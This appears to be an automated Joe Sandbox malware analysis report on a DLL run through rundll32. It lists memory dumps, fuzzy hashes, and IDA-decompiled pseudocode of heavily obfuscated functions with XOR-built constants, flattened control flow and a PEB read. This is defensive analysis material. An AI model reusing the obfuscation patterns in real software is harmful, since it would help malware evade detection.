                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #Lk
                                                                                                                      • API String ID: 0-1139186034
                                                                                                                      • Opcode ID: 113ec85c3a59fd735fa232de4a646e64cc00cec35d4fe763381d1135a8ddbe7c
                                                                                                                      • Instruction ID: 4214c31ad117165459d2d1bcc2c4c95bad5b1e87411d441bbd0d91e0e8b1cebf
                                                                                                                      • Opcode Fuzzy Hash: 113ec85c3a59fd735fa232de4a646e64cc00cec35d4fe763381d1135a8ddbe7c
                                                                                                                      • Instruction Fuzzy Hash: 0B31CDB1C0131EABCB98CFA5C94A5EEBBB5BF14318F208198D515B6260D3B91B45CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                      • Instruction ID: 1bfcaf43c27c81d10410876f8fc1d5c1a29ddf16da4e3393733b86403839c423
                                                                                                                      • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                      • Instruction Fuzzy Hash: 2CD15C73C0E9F70E8377C12E506866AEAB2AFC298271FC3E1DCD42F689D2265D1195D0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                      • Instruction ID: 82a22fea4dee095689a33f7c41869eea601d71afe1f9cce3cb1ebeaf0be2af07
                                                                                                                      • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                      • Instruction Fuzzy Hash: 0BD16A73C0E9B70E8376C12E54A866BEAB2AFC158271FC3A1DCD02F689D6269D0595D0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                      • Instruction ID: 4b1b82cb2a868ffe554c354e232f2920846bc0ab95f092044db9cceed5b195f9
                                                                                                                      • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                      • Instruction Fuzzy Hash: 3BC17F77C1E9B70E8377C12E44A85AAEAB2AFC659271FC3E1CCD43F689D2265D0185D0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                      • Instruction ID: b56b4bdd56439ea2f6f9f3f119f05c546accd6e672066d429c0e352e3a467874
                                                                                                                      • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                      • Instruction Fuzzy Hash: 58C18273D0E9B70E8377C12E44A85AAEEB2AFC558271FC3E1CCD42F289E6265D0595D0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 86%
                                                                                                                      			E002BFD8C() {
                                                                                                                      				unsigned int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				unsigned int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				short _t136;
                                                                                                                      				short _t138;
                                                                                                                      				signed int _t141;
                                                                                                                      				signed int _t144;
                                                                                                                      				void* _t145;
                                                                                                                      				void* _t146;
                                                                                                                      				intOrPtr _t164;
                                                                                                                      				void* _t165;
                                                                                                                      				short* _t166;
                                                                                                                      				short* _t167;
                                                                                                                      				void* _t168;
                                                                                                                      				short* _t169;
                                                                                                                      				signed int _t170;
                                                                                                                      				signed int _t171;
                                                                                                                      				signed int _t172;
                                                                                                                      				signed int _t173;
                                                                                                                      				void* _t174;
                                                                                                                      
                                                                                                                      				_t164 =  *0x2d520c; // 0x0
                                                                                                                      				_v8 = 0xafc848;
                                                                                                                      				_t165 = _t164 + 0x220;
                                                                                                                      				_t146 = 0xaad6b4c;
                                                                                                                      				_t170 = 0xc;
                                                                                                                      				_v8 = _v8 / _t170;
                                                                                                                      				_v8 = _v8 ^ 0xeddef8c6;
                                                                                                                      				_v8 = _v8 >> 4;
                                                                                                                      				_v8 = _v8 ^ 0x0edbb261;
                                                                                                                      				_v16 = 0xa05fce;
                                                                                                                      				_v16 = _v16 + 0x102e;
                                                                                                                      				_v16 = _v16 + 0x8702;
                                                                                                                      				_v16 = _v16 ^ 0x00a5637b;
                                                                                                                      				_v48 = 0xdd0656;
                                                                                                                      				_v48 = _v48 >> 2;
                                                                                                                      				_v48 = _v48 ^ 0x00330133;
                                                                                                                      				_v24 = 0x8dacbc;
                                                                                                                      				_t144 = 0x5c;
                                                                                                                      				_t171 = 0x3d;
                                                                                                                      				_v24 = _v24 * 0x19;
                                                                                                                      				_v24 = _v24 / _t144;
                                                                                                                      				_v24 = _v24 ^ 0x00283487;
                                                                                                                      				_v20 = 0x519264;
                                                                                                                      				_t145 = 2;
                                                                                                                      				_v20 = _v20 * 0x67;
                                                                                                                      				_v20 = _v20 << 1;
                                                                                                                      				_v20 = _v20 ^ 0x41a5f983;
                                                                                                                      				_v32 = 0xc0edbc;
                                                                                                                      				_v32 = _v32 * 0x1e;
                                                                                                                      				_v32 = _v32 << 0x10;
                                                                                                                      				_v32 = _v32 ^ 0xdc023425;
                                                                                                                      				_v28 = 0xb6ecb7;
                                                                                                                      				_v28 = _v28 * 0x1e;
                                                                                                                      				_v28 = _v28 + 0x349f;
                                                                                                                      				_v28 = _v28 ^ 0x156255f9;
                                                                                                                      				_v36 = 0x8be990;
                                                                                                                      				_v36 = _v36 | 0x6444358b;
                                                                                                                      				_v36 = _v36 * 0x59;
                                                                                                                      				_v36 = _v36 ^ 0x0c402a41;
                                                                                                                      				_v52 = 0xcdd122;
                                                                                                                      				_v52 = _v52 ^ 0xde2c2ef8;
                                                                                                                      				_v52 = _v52 ^ 0xdee78ce8;
                                                                                                                      				_v40 = 0xa1b7cb;
                                                                                                                      				_v40 = _v40 ^ 0x66c9ba9b;
                                                                                                                      				_v40 = _v40 + 0xffffb195;
                                                                                                                      				_v40 = _v40 ^ 0x666fdaad;
                                                                                                                      				_v56 = 0x9437d4;
                                                                                                                      				_v56 = _v56 / _t171;
                                                                                                                      				_v56 = _v56 ^ 0x00087e9b;
                                                                                                                      				_v12 = 0x6793e4;
                                                                                                                      				_v12 = _v12 << 2;
                                                                                                                      				_v12 = _v12 >> 8;
                                                                                                                      				_v12 = _v12 << 3;
                                                                                                                      				_v12 = _v12 ^ 0x000c2cdf;
                                                                                                                      				_v44 = 0x8cb917;
                                                                                                                      				_v44 = _v44 >> 0xf;
                                                                                                                      				_v44 = _v44 << 6;
                                                                                                                      				_v44 = _v44 ^ 0x00016464;
                                                                                                                      				do {
                                                                                                                      					while(_t146 != 0xa09253) {
                                                                                                                      						if(_t146 == 0x53e5fac) {
                                                                                                                      							_t172 = E002BEF71(4, 0x10);
                                                                                                                      							_push(_t172);
                                                                                                                      							_push(_v56);
                                                                                                                      							_push(_t165);
                                                                                                                      							E002B5A07(1, _v40);
                                                                                                                      							_t174 = _t174 + 0x14;
                                                                                                                      							_t167 = _t165 + _t172 * 2;
                                                                                                                      							_t146 = 0xa09253;
                                                                                                                      							_t136 = 0x2e;
                                                                                                                      							 *_t167 = _t136;
                                                                                                                      							_t165 = _t167 + _t145;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t146 == 0xaad6b4c) {
                                                                                                                      								_t138 = E002B5AE2(_t146);
                                                                                                                      								_t146 = 0xd305119;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t146 == 0xd305119) {
                                                                                                                      									_t141 = E002BEF71(4, 0x10);
                                                                                                                      									_push(1);
                                                                                                                      									_push(_v20);
                                                                                                                      									_push(_t165);
                                                                                                                      									_t173 = _t141;
                                                                                                                      									E002B5A07(_t145, _v24);
                                                                                                                      									_push(_t173);
                                                                                                                      									_push(_v28);
                                                                                                                      									_t168 = _t165 + _t145;
                                                                                                                      									_push(_t168);
                                                                                                                      									E002B5A07(1, _v32);
                                                                                                                      									_t174 = _t174 + 0x20;
                                                                                                                      									_t169 = _t168 + _t173 * 2;
                                                                                                                      									_t146 = 0x53e5fac;
                                                                                                                      									_t138 = 0x5c;
                                                                                                                      									 *_t169 = _t138;
                                                                                                                      									_t165 = _t169 + _t145;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						goto L9;
                                                                                                                      					}
                                                                                                                      					_push(3);
                                                                                                                      					_push(_v44);
                                                                                                                      					_push(_t165);
                                                                                                                      					E002B5A07(1, _v12);
                                                                                                                      					_t166 = _t165 + 6;
                                                                                                                      					_t174 = _t174 + 0xc;
                                                                                                                      					_t146 = 0xc2dacde;
                                                                                                                      					 *_t166 = 0;
                                                                                                                      					_t165 = _t166 + _t145;
                                                                                                                      					L9:
                                                                                                                      				} while (_t146 != 0xc2dacde);
                                                                                                                      				return _t138;
                                                                                                                      			}

































                                                                                                                      0x002bffbc
                                                                                                                      0x002bffbe
                                                                                                                      0x002bffc6
                                                                                                                      0x002bffc8
                                                                                                                      0x002bffcd
                                                                                                                      0x002bffd2
                                                                                                                      0x002bffd5
                                                                                                                      0x002bffda
                                                                                                                      0x002bffdd
                                                                                                                      0x002bffdf
                                                                                                                      0x002bffdf
                                                                                                                      0x002bfff1

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • Opcode ID: fd4c091fded871f214a2cb25c77759b6ad8625bc4cc70d854d137aa0805295f2
                                                                                                                      • Instruction ID: 775444558ca99efd789c8055ed58d5d40008b22b5b279b93fc602580f27e2f24
                                                                                                                      • Opcode Fuzzy Hash: fd4c091fded871f214a2cb25c77759b6ad8625bc4cc70d854d137aa0805295f2
                                                                                                                      • Instruction Fuzzy Hash: 0C615675D11209ABDF08DFA4C98AAEEFBB1FF48314F204119E612BB290D3B51A55CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 82%
                                                                                                                      			E002CE498(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				void* _v68;
                                                                                                                      				intOrPtr _v72;
                                                                                                                      				char _v592;
                                                                                                                      				void* _t122;
                                                                                                                      				signed int _t137;
                                                                                                                      				signed int _t138;
                                                                                                                      
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E002BCF25(_t122);
                                                                                                                      				_v72 = 0xec580c;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t137 = 0x76;
                                                                                                                      				asm("stosd");
                                                                                                                      				asm("stosd");
                                                                                                                      				_v48 = 0xa71dc1;
                                                                                                                      				_v48 = _v48 << 0x10;
                                                                                                                      				_v48 = _v48 ^ 0x1dc99f4e;
                                                                                                                      				_v8 = 0x906d24;
                                                                                                                      				_v8 = _v8 | 0x748f1c77;
                                                                                                                      				_v8 = _v8 + 0xffff13d2;
                                                                                                                      				_v8 = _v8 * 0x4a;
                                                                                                                      				_v8 = _v8 ^ 0xb5d1b34d;
                                                                                                                      				_v32 = 0x99e404;
                                                                                                                      				_v32 = _v32 ^ 0xe9d0d5f4;
                                                                                                                      				_v32 = _v32 + 0x5a31;
                                                                                                                      				_v32 = _v32 ^ 0xe94bd9b5;
                                                                                                                      				_v16 = 0xd98a19;
                                                                                                                      				_v16 = _v16 + 0xffff99bf;
                                                                                                                      				_v16 = _v16 + 0x1a5b;
                                                                                                                      				_v16 = _v16 << 0xa;
                                                                                                                      				_v16 = _v16 ^ 0x64f05351;
                                                                                                                      				_v40 = 0x441d8c;
                                                                                                                      				_v40 = _v40 + 0xbe9c;
                                                                                                                      				_t138 = 0x7a;
                                                                                                                      				_v40 = _v40 / _t137;
                                                                                                                      				_v40 = _v40 ^ 0x00086b18;
                                                                                                                      				_v20 = 0xfc7ad5;
                                                                                                                      				_v20 = _v20 + 0x78e5;
                                                                                                                      				_v20 = _v20 + 0xffff6dfc;
                                                                                                                      				_v20 = _v20 + 0xa8d2;
                                                                                                                      				_v20 = _v20 ^ 0x00f25a11;
                                                                                                                      				_v44 = 0xb09661;
                                                                                                                      				_v44 = _v44 << 2;
                                                                                                                      				_v44 = _v44 + 0x5c70;
                                                                                                                      				_v44 = _v44 ^ 0x02c80175;
                                                                                                                      				_v12 = 0xc44555;
                                                                                                                      				_v12 = _v12 | 0x8aaf582b;
                                                                                                                      				_v12 = _v12 >> 3;
                                                                                                                      				_v12 = _v12 ^ 0x8e0d3178;
                                                                                                                      				_v12 = _v12 ^ 0x9f5e57b0;
                                                                                                                      				_v36 = 0x15e160;
                                                                                                                      				_v36 = _v36 << 7;
                                                                                                                      				_v36 = _v36 * 0x45;
                                                                                                                      				_v36 = _v36 ^ 0xf2df9ca5;
                                                                                                                      				_v24 = 0xe11875;
                                                                                                                      				_v24 = _v24 + 0xffffa15f;
                                                                                                                      				_v24 = _v24 / _t138;
                                                                                                                      				_v24 = _v24 ^ 0x000fcfe6;
                                                                                                                      				_v56 = 0xedc19c;
                                                                                                                      				_v56 = _v56 | 0x5ad96a0a;
                                                                                                                      				_v56 = _v56 ^ 0x5af69f46;
                                                                                                                      				_v52 = 0x112c39;
                                                                                                                      				_v52 = _v52 << 3;
                                                                                                                      				_v52 = _v52 ^ 0x00831cf8;
                                                                                                                      				_v28 = 0xaa6b89;
                                                                                                                      				_v28 = _v28 >> 4;
                                                                                                                      				_v28 = _v28 + 0xffff7c23;
                                                                                                                      				_v28 = _v28 ^ 0x00029c7f;
                                                                                                                      				_push(_v16);
                                                                                                                      				_push(_v32);
                                                                                                                      				_push(0x2b12a4);
                                                                                                                      				E002B3BF8(_v20, _v28, E002BAB66(_v48, _v8, _v28), _v44, _v12,  &_v592, _a8);
                                                                                                                      				E002BAE03(_v36, _v24, _v56, _t131);
                                                                                                                      				return E002BBAB0( &_v592, _v52, _v28);
                                                                                                                      			}























                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • Opcode ID: 89b69252566239da5d02c6709224186c8c9c457cb955358e373656d3d6d9b835
                                                                                                                      • Instruction ID: 9f4bfaeaf8e53c9f0293d8e746a64ff3e96548865898124047e8efdfdf7ae3a3
                                                                                                                      • Opcode Fuzzy Hash: 89b69252566239da5d02c6709224186c8c9c457cb955358e373656d3d6d9b835
                                                                                                                      • Instruction Fuzzy Hash: 5E5123B2D0131DEBCF14DFA5C94A4DEBBB2FB14318F208198E411B6260D7B91A19CF91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E002B68DE(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				unsigned int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				void* _t87;
                                                                                                                      				signed int _t99;
                                                                                                                      				signed int _t100;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				E002BCF25(_t87);
                                                                                                                      				_v8 = 0x73b8de;
                                                                                                                      				_v8 = _v8 ^ 0x19054fb7;
                                                                                                                      				_v8 = _v8 << 0xd;
                                                                                                                      				_v8 = _v8 + 0x3490;
                                                                                                                      				_v8 = _v8 ^ 0xdee55d26;
                                                                                                                      				_v20 = 0xe646cf;
                                                                                                                      				_v20 = _v20 >> 0xb;
                                                                                                                      				_v20 = _v20 ^ 0x0000515e;
                                                                                                                      				_v16 = 0xc8864d;
                                                                                                                      				_v16 = _v16 >> 7;
                                                                                                                      				_v16 = _v16 + 0xffff7ea5;
                                                                                                                      				_v16 = _v16 >> 1;
                                                                                                                      				_v16 = _v16 ^ 0x000d0f10;
                                                                                                                      				_v16 = 0xf76b6b;
                                                                                                                      				_v16 = _v16 + 0xffff8d96;
                                                                                                                      				_v16 = _v16 + 0xa530;
                                                                                                                      				_v16 = _v16 ^ 0x00f3b26e;
                                                                                                                      				_v28 = 0xad3635;
                                                                                                                      				_v28 = _v28 << 4;
                                                                                                                      				_v28 = _v28 ^ 0x0ad12e90;
                                                                                                                      				_v28 = 0xa7b230;
                                                                                                                      				_t99 = 0x21;
                                                                                                                      				_v28 = _v28 * 0x16;
                                                                                                                      				_v28 = _v28 ^ 0x0e6a6f58;
                                                                                                                      				_v28 = 0xa141da;
                                                                                                                      				_v28 = _v28 / _t99;
                                                                                                                      				_v28 = _v28 ^ 0x0004c009;
                                                                                                                      				_v16 = 0x3b52c9;
                                                                                                                      				_t100 = 0x69;
                                                                                                                      				_v16 = _v16 / _t100;
                                                                                                                      				_v16 = _v16 | 0xd3b68a53;
                                                                                                                      				_v16 = _v16 + 0xffff1b94;
                                                                                                                      				_v16 = _v16 ^ 0xd3beae71;
                                                                                                                      				_v12 = 0xce562d;
                                                                                                                      				_v12 = _v12 << 0x10;
                                                                                                                      				_v12 = _v12 << 0x10;
                                                                                                                      				_v12 = _v12 + 0xffff0c4b;
                                                                                                                      				_v12 = _v12 ^ 0xfffd1cdf;
                                                                                                                      				_v24 = 0x109fa9;
                                                                                                                      				_v24 = _v24 >> 8;
                                                                                                                      				_v24 = _v24 ^ 0x0002830d;
                                                                                                                      				return E002C40F4(_v28, _v16, _a12, _v12, _v24, E002C5BB3());
                                                                                                                      			}













                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d2a8de53734b9d3901bc94b6b25c32e81bc309cda1bfd67e32ed41b72a8c3f3f
                                                                                                                      • Instruction ID: eccbb46693d309f408db18eab5f1ad13c69b9b7209565e6944d00fffcaa71f0f
                                                                                                                      • Opcode Fuzzy Hash: d2a8de53734b9d3901bc94b6b25c32e81bc309cda1bfd67e32ed41b72a8c3f3f
                                                                                                                      • Instruction Fuzzy Hash: B531B1B6C0170DEBDF49DFE5D84A4EEBBB1BB10308F208599E611A6251D3B55B54CF80
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E002CD374() {
                                                                                                                      
                                                                                                                      				return  *[fs:0x30];
                                                                                                                      			}



                                                                                                                      0x002cd37a

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                      • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                      • ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                      • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                      • GetVersion.KERNEL32 ref: 10014EC3
                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10014EE8
                                                                                                                      • RegQueryValueExA.ADVAPI32 ref: 10014F0D
                                                                                                                      • _sscanf.LIBCMT ref: 10014F2D
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014F62
                                                                                                                      • ConvertDefaultLocale.KERNEL32(72A4FFF6), ref: 10014F68
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 10014F77
                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 10014F87
                                                                                                                      • EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,10014522,?), ref: 10014FA2
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014FD3
                                                                                                                      • ConvertDefaultLocale.KERNEL32(72A4FFF6), ref: 10014FD9
                                                                                                                      • _memset.LIBCMT ref: 10014FF3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                                                                                      • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                                      • API String ID: 434808117-483790700
                                                                                                                      • Opcode ID: 147489415d7f7f12e4b820da42085f8fd97c08a4daccd4d9168a1bbabc89fc72
